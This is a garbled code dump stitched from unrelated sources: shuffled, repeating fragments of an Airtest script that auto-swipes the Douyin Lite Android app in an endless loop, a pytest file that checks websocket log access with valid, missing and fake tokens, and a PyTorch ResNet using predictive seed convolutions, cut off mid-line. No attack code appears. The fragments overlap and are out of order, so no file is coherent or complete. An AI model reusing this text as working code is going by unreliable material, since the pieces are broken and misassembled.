print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake() # 启动手机 start_app(\"com.ss.android.ugc.aweme.lite\")", "swipe((484, 1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") # generate html report #", "from douyin import * if not cli_setup(): auto_setup(__file__, logdir=True, devices=[", "print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") # generate html report # from airtest.report.report", "cli_setup # from douyin import * if not cli_setup(): auto_setup(__file__,", "<filename>a1.py # -*- encoding=utf8 -*- __author__ = \"pscly\" from airtest.core.api", "2340))) sleep(5) swipe((484, 1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") # generate html", "# 启动手机 start_app(\"com.ss.android.ugc.aweme.lite\") hua = 0 滑动方向 = 0 while", "__author__ = \"pscly\" from airtest.core.api import * from airtest.cli.parser import", "douyin import * if not cli_setup(): auto_setup(__file__, logdir=True, devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\",", "]) # script content print(\"start...\") print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake()", "print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake() # 启动手机 start_app(\"com.ss.android.ugc.aweme.lite\") hua = 0 滑动方向", "0 滑动方向 = 0 while 1: hua += 1 滑动方向", "== 10: touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404, -0.67), resolution=(1079, 2340))) sleep(5) swipe((484, 1711),(531,709))", "print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") # generate html report # from airtest.report.report import", "if not cli_setup(): auto_setup(__file__, logdir=True, devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ]) # script", "print(\"start...\") print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake() # 启动手机 start_app(\"com.ss.android.ugc.aweme.lite\") hua", "10: touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404, -0.67), resolution=(1079, 2340))) sleep(5) swipe((484, 1711),(531,709)) 
print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\")", "generate html report # from airtest.report.report import simple_report # simple_report(__file__,", "html report # from airtest.report.report import simple_report # simple_report(__file__, logpath=True)", "touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404, -0.67), resolution=(1079, 2340))) sleep(5) swipe((484, 1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\")", "+= 1 if hua == 10: touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404, -0.67), resolution=(1079,", "1 滑动方向 += 1 if hua == 10: touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404,", "hua == 10: touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404, -0.67), resolution=(1079, 2340))) sleep(5) swipe((484,", "# script content print(\"start...\") print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake() #", "= 0 while 1: hua += 1 滑动方向 += 1", "if hua == 10: touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404, -0.67), resolution=(1079, 2340))) sleep(5)", "start_app(\"com.ss.android.ugc.aweme.lite\") hua = 0 滑动方向 = 0 while 1: hua", "encoding=utf8 -*- __author__ = \"pscly\" from airtest.core.api import * from", "hua += 1 滑动方向 += 1 if hua == 10:", "logdir=True, devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ]) # script content print(\"start...\") print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\")", "# -*- encoding=utf8 -*- __author__ = \"pscly\" from airtest.core.api import", "hua = 0 滑动方向 = 0 while 1: hua +=", "滑动方向 += 1 if hua == 10: touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404, -0.67),", "airtest.core.api import * from airtest.cli.parser import cli_setup # from douyin", "滑动方向 = 0 while 1: hua += 1 滑动方向 +=", "from airtest.core.api import * from airtest.cli.parser import cli_setup # from", "启动手机 start_app(\"com.ss.android.ugc.aweme.lite\") hua = 0 滑动方向 = 0 while 1:", "print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake() # 启动手机 start_app(\"com.ss.android.ugc.aweme.lite\") hua =", "while 1: hua += 1 滑动方向 += 1 if hua", "+= 1 滑动方向 += 1 if hua == 10: touch(Template(r\"tpl1607564875731.png\",", "record_pos=(-0.404, -0.67), resolution=(1079, 2340))) sleep(5) swipe((484, 1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\")", "-0.67), resolution=(1079, 2340))) sleep(5) swipe((484, 1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") 
print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") #", "auto_setup(__file__, logdir=True, devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ]) # script content print(\"start...\") print(\"冲冲冲!\")", "sleep(5) swipe((484, 1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") # generate html report", "1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") # generate html report # from", "* from airtest.cli.parser import cli_setup # from douyin import *", "airtest.cli.parser import cli_setup # from douyin import * if not", "# from douyin import * if not cli_setup(): auto_setup(__file__, logdir=True,", "import * if not cli_setup(): auto_setup(__file__, logdir=True, devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ])", "wake() # 启动手机 start_app(\"com.ss.android.ugc.aweme.lite\") hua = 0 滑动方向 = 0", "# generate html report # from airtest.report.report import simple_report #", "script content print(\"start...\") print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake() # 启动手机" ]
[ "is not None assert in_log in result delete_all(client, [c]) def", "ws.create_connection(logs.url) assert 'Handshake status 401' in str(excinfo.value) delete_all(client, [c]) def", "import websocket as ws import pytest def get_logs(client): hosts =", "{}; sleep 2\"'.format(in_log) c = client.create_container(image=TEST_IMAGE_UUID, command=cmd) c = client.wait_success(c)", "'?token='+logs.token) result = conn.recv() assert result is not None assert", "random_str() cmd = '/bin/bash -c \"echo {}; sleep 2\"'.format(in_log) c", "def test_logs_token(client): logs, in_log, c = get_logs(client) conn = ws.create_connection(logs.url", "2\"'.format(in_log) c = client.create_container(image=TEST_IMAGE_UUID, command=cmd) c = client.wait_success(c) logs =", "as excinfo: ws.create_connection(logs.url+'?token=random.garbage.token') assert 'Handshake status 401' in str(excinfo.value) delete_all(client,", "c = client.create_container(image=TEST_IMAGE_UUID, command=cmd) c = client.wait_success(c) logs = c.logs()", "= ws.create_connection(logs.url + '?token='+logs.token) result = conn.recv() assert result is", "import * # NOQA import websocket as ws import pytest", "[c]) def test_logs_no_token(client): logs, _, c = get_logs(client) with pytest.raises(Exception)", "get_logs(client) conn = ws.create_connection(logs.url + '?token='+logs.token) result = conn.recv() assert", "logs = c.logs() return logs, in_log, c def test_logs_token(client): logs,", "= get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url+'?token=random.garbage.token') assert 'Handshake status", "status 401' in str(excinfo.value) delete_all(client, [c]) def test_host_api_garbage_token(client): logs, _,", "401' in str(excinfo.value) delete_all(client, [c]) def test_host_api_garbage_token(client): logs, _, c", "client.create_container(image=TEST_IMAGE_UUID, command=cmd) c = client.wait_success(c) logs = c.logs() return logs,", "logs, in_log, c def test_logs_token(client): logs, in_log, c = get_logs(client)", "conn.recv() assert result is not None assert in_log in result", "assert 'Handshake status 401' in str(excinfo.value) delete_all(client, [c]) def test_host_api_garbage_token(client):", "hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 in_log =", "in_log = random_str() cmd = '/bin/bash -c \"echo {}; sleep", "pytest def get_logs(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) >", "ws import pytest def get_logs(client): hosts = client.list_host(kind='docker', removed_null=True) assert", "with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url) assert 'Handshake status 401' in", "= client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 in_log = random_str()", "with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url+'?token=random.garbage.token') assert 'Handshake status 401' in", "assert result is not None assert in_log in result delete_all(client,", "in_log in result delete_all(client, [c]) def test_logs_no_token(client): logs, _, c", "not None assert in_log in result delete_all(client, [c]) def test_logs_no_token(client):", "> 0 in_log = random_str() cmd = '/bin/bash -c \"echo", "0 in_log = random_str() cmd = '/bin/bash -c \"echo {};", "command=cmd) c = client.wait_success(c) logs = c.logs() return logs, in_log,", "delete_all(client, [c]) def test_logs_no_token(client): logs, _, c = get_logs(client) with", "in_log, c def test_logs_token(client): logs, in_log, c = get_logs(client) conn", 
"sleep 2\"'.format(in_log) c = client.create_container(image=TEST_IMAGE_UUID, command=cmd) c = client.wait_success(c) logs", "def test_logs_no_token(client): logs, _, c = get_logs(client) with pytest.raises(Exception) as", "get_logs(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 in_log", "'/bin/bash -c \"echo {}; sleep 2\"'.format(in_log) c = client.create_container(image=TEST_IMAGE_UUID, command=cmd)", "delete_all(client, [c]) def test_host_api_garbage_token(client): logs, _, c = get_logs(client) with", "test_logs_no_token(client): logs, _, c = get_logs(client) with pytest.raises(Exception) as excinfo:", "= '/bin/bash -c \"echo {}; sleep 2\"'.format(in_log) c = client.create_container(image=TEST_IMAGE_UUID,", "= get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url) assert 'Handshake status", "return logs, in_log, c def test_logs_token(client): logs, in_log, c =", "test_host_api_garbage_token(client): logs, _, c = get_logs(client) with pytest.raises(Exception) as excinfo:", "= c.logs() return logs, in_log, c def test_logs_token(client): logs, in_log,", "None assert in_log in result delete_all(client, [c]) def test_logs_no_token(client): logs,", "c def test_logs_token(client): logs, in_log, c = get_logs(client) conn =", "result is not None assert in_log in result delete_all(client, [c])", "pytest.raises(Exception) as excinfo: ws.create_connection(logs.url+'?token=random.garbage.token') assert 'Handshake status 401' in str(excinfo.value)", "= random_str() cmd = '/bin/bash -c \"echo {}; sleep 2\"'.format(in_log)", "excinfo: ws.create_connection(logs.url) assert 'Handshake status 401' in str(excinfo.value) delete_all(client, [c])", "conn = ws.create_connection(logs.url + '?token='+logs.token) result = conn.recv() assert result", "c = client.wait_success(c) logs = c.logs() return logs, in_log, c", "len(hosts) > 0 in_log = random_str() cmd = '/bin/bash -c", "c = get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url) assert 'Handshake", "result = conn.recv() assert result is not None assert in_log", "= client.wait_success(c) logs = c.logs() return logs, in_log, c def", "from common_fixtures import * # NOQA import websocket as ws", "def get_logs(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0", "assert in_log in result delete_all(client, [c]) def test_logs_no_token(client): logs, _,", "in result delete_all(client, [c]) def test_logs_no_token(client): logs, _, c =", "client.wait_success(c) logs = c.logs() return logs, in_log, c def test_logs_token(client):", "excinfo: ws.create_connection(logs.url+'?token=random.garbage.token') assert 'Handshake status 401' in str(excinfo.value) delete_all(client, [c])", "as excinfo: ws.create_connection(logs.url) assert 'Handshake status 401' in str(excinfo.value) delete_all(client,", "_, c = get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url) assert", "NOQA import websocket as ws import pytest def get_logs(client): hosts", "get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url) assert 'Handshake status 401'", "in_log, c = get_logs(client) conn = ws.create_connection(logs.url + '?token='+logs.token) result", "pytest.raises(Exception) as excinfo: ws.create_connection(logs.url) assert 'Handshake status 401' in str(excinfo.value)", "c = get_logs(client) conn = ws.create_connection(logs.url + '?token='+logs.token) result =", 
"test_logs_token(client): logs, in_log, c = get_logs(client) conn = ws.create_connection(logs.url +", "'Handshake status 401' in str(excinfo.value) delete_all(client, [c]) def test_host_api_garbage_token(client): logs,", "logs, _, c = get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url+'?token=random.garbage.token')", "= conn.recv() assert result is not None assert in_log in", "logs, in_log, c = get_logs(client) conn = ws.create_connection(logs.url + '?token='+logs.token)", "* # NOQA import websocket as ws import pytest def", "client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 in_log = random_str() cmd", "= get_logs(client) conn = ws.create_connection(logs.url + '?token='+logs.token) result = conn.recv()", "def test_host_api_garbage_token(client): logs, _, c = get_logs(client) with pytest.raises(Exception) as", "in str(excinfo.value) delete_all(client, [c]) def test_host_api_garbage_token(client): logs, _, c =", "ws.create_connection(logs.url + '?token='+logs.token) result = conn.recv() assert result is not", "_, c = get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url+'?token=random.garbage.token') assert", "c.logs() return logs, in_log, c def test_logs_token(client): logs, in_log, c", "= client.create_container(image=TEST_IMAGE_UUID, command=cmd) c = client.wait_success(c) logs = c.logs() return", "# NOQA import websocket as ws import pytest def get_logs(client):", "get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url+'?token=random.garbage.token') assert 'Handshake status 401'", "removed_null=True) assert len(hosts) > 0 in_log = random_str() cmd =", "-c \"echo {}; sleep 2\"'.format(in_log) c = client.create_container(image=TEST_IMAGE_UUID, command=cmd) c", "\"echo {}; sleep 2\"'.format(in_log) c = client.create_container(image=TEST_IMAGE_UUID, command=cmd) c =", "logs, _, c = get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url)", "+ '?token='+logs.token) result = conn.recv() assert result is not None", "assert len(hosts) > 0 in_log = random_str() cmd = '/bin/bash", "websocket as ws import pytest def get_logs(client): hosts = client.list_host(kind='docker',", "result delete_all(client, [c]) def test_logs_no_token(client): logs, _, c = get_logs(client)", "cmd = '/bin/bash -c \"echo {}; sleep 2\"'.format(in_log) c =", "import pytest def get_logs(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts)", "common_fixtures import * # NOQA import websocket as ws import", "c = get_logs(client) with pytest.raises(Exception) as excinfo: ws.create_connection(logs.url+'?token=random.garbage.token') assert 'Handshake", "str(excinfo.value) delete_all(client, [c]) def test_host_api_garbage_token(client): logs, _, c = get_logs(client)", "[c]) def test_host_api_garbage_token(client): logs, _, c = get_logs(client) with pytest.raises(Exception)", "as ws import pytest def get_logs(client): hosts = client.list_host(kind='docker', removed_null=True)" ]
[ "Image Recognition. arXiv:1512.03385 ''' from numpy.lib.arraysetops import isin import torch", "planes, kernel_size=1, bias=False) self.conv1 = conv1x1(in_planes, planes, stride=1, input_signed=False, predictive_forward=False,", "stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn3 = nn.BatchNorm2d(self.expansion*planes) self.shortcut = nn.Sequential()", "WRITER = None WRITER_PREFIX_COUNTER = 0 # Tunable PREDICTIVE_BACKWARD =", "x): out = F.relu(self.bn1(self.conv1(x))) out = self.layer1(out) out = self.layer2(out)", "in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION,", "is not None: out = self.layer4(out) # out = F.avg_pool2d(out,", "ResNet, see 'preact_resnet.py'. Reference: [1] <NAME>, <NAME>, <NAME>, <NAME> Deep", "!= self.expansion*planes: self.shortcut = nn.Sequential( # nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride,", "for Image Recognition. arXiv:1512.03385 ''' from numpy.lib.arraysetops import isin import", "np from models.masked_psg_seed_conv import PredictiveSeedConv2d from masked_layers import layers #", "nn.Sequential(*layers) def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = self.layer1(out)", "out = F.avg_pool2d(out, out.size()[3]) out = out.view(out.size(0), -1) out =", "ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method) def PsgSeedResNet18( num_classes=10, init_method='standard', predictive_backward=True,", "= 4 def __init__(self, in_planes, planes, stride=1): super(Bottleneck, self).__init__() #", "reset to {}'.format(init_method)) def reset_parameters(self, module, init_method=\"kaiming_uniform\") -> None: if", "= F.avg_pool2d(out, 4) out = F.avg_pool2d(out, out.size()[3]) out = out.view(out.size(0),", "[3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet101( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4,", "predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) def", "PREDICTIVE_BACKWARD = True MSB_BITS = 4 MSB_BITS_WEIGHT = 4 MSB_BITS_GRAD", "writer=WRITER, writer_prefix=writer_prefix) class BasicBlock(nn.Module): expansion = 1 def __init__(self, in_planes,", "= nn.BatchNorm2d(planes) self.conv2 = conv3x3(planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None)", "planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) # self.conv2", "= conv3x3(in_planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes)", "self.conv1 = conv3x3(in_planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 =", "= nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False) self.layer1 = self._make_layer(block,", "PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=3, stride=stride, padding=1,", "num_classes=10, init_method='standard'): super(ResNet, self).__init__() self.in_planes = in_planes self.conv1 = conv3x3(3,", "Deep Residual Learning for Image Recognition. arXiv:1512.03385 ''' from numpy.lib.arraysetops", "using PSG in PyTorch. 
For Pre-activation ResNet, see 'preact_resnet.py'. Reference:", "= threshold SPARSIFY = sparsify SIGN = sign return ResNet(BasicBlock,", "nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False) self.layer1 = self._make_layer(block, 64,", "bias=False), conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None), nn.BatchNorm2d(self.expansion*planes) ) def", "nn.Conv2d(in_planes, planes, kernel_size=1, bias=False) self.conv1 = conv1x1(in_planes, planes, stride=1, input_signed=False,", "self.modules(): if isinstance(m, nn.Conv2d): self.reset_parameters(m, init_method) def get_bop_params(self): bop_params =", "self.bn2 = nn.BatchNorm2d(planes) # self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)", "num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD,", "input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) # self.conv3 = nn.Conv2d(planes,", "MSB_BITS_GRAD = msb_bits_grad THRESHOLD = threshold SPARSIFY = sparsify SIGN", "= sparsify SIGN = sign return ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes,", "in self.modules(): if isinstance(m, nn.Conv2d): bop_params += list(m.parameters()) return bop_params", "stride): strides = [stride] + [1]*(num_blocks-1) layers = [] for", "self).__init__() self.conv1 = conv3x3(in_planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1", "m in self.modules(): if isinstance(m, nn.Conv2d): bop_params += list(m.parameters()) return", "== \"kaiming_constant_unsigned\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") std", "isin import torch import torch.nn as nn import torch.nn.functional as", "arXiv:1512.03385 ''' from numpy.lib.arraysetops import isin import torch import torch.nn", "out_planes, stride=1, input_signed=False, predictive_forward=True, writer_prefix=\"\"): \"3x3 convolution with padding\" predictive_forward", "512, num_blocks[3], stride=2) self.linear = nn.Linear(512*block.expansion, num_classes) #self.linear = layers.Linear(512*block.expansion,", "self._make_layer(block, 32, num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2)", "* block.expansion return nn.Sequential(*layers) def forward(self, x): out = F.relu(self.bn1(self.conv1(x)))", "stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) self.conv2 = conv3x3(planes,", "input_signed=True, predictive_forward=True, writer_prefix=\"\"): \"1x1 convolution with no padding\" predictive_forward =", "self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 128,", "= conv3x3(planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes)", "def conv1x1(in_planes, out_planes, stride=1, input_signed=True, predictive_forward=True, writer_prefix=\"\"): \"1x1 convolution with", "stride=2) self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2) self.layer4 = self._make_layer(block,", "non_bop_params += list(m.parameters()) return non_bop_params def _make_layer(self, block, planes, 
num_blocks,", "planes, stride)) self.in_planes = planes * block.expansion return nn.Sequential(*layers) def", "nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") std = gain / math.sqrt(fan)", "PredictiveSeedConv2d( in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD,", "16: self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1) self.layer2 = self._make_layer(block,", "std elif init_method == \"kaiming_normal\": nn.init.kaiming_normal_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method", "msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) def conv3x3(in_planes, out_planes, stride=1,", "init_method=init_method) def PsgSeedResNet34( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0,", "nn.Sequential() if stride != 1 or in_planes != self.expansion*planes: self.shortcut", "num_classes=num_classes, init_method=init_method) def PsgSeedResNet101( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,", "<NAME>, <NAME>, <NAME>, <NAME> Deep Residual Learning for Image Recognition.", "out += self.shortcut(x) out = F.relu(out) return out class Bottleneck(nn.Module):", "nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") scale = gain / math.sqrt(2.0", "= [stride] + [1]*(num_blocks-1) layers = [] for stride in", "math.sqrt(2.0 * fan) with 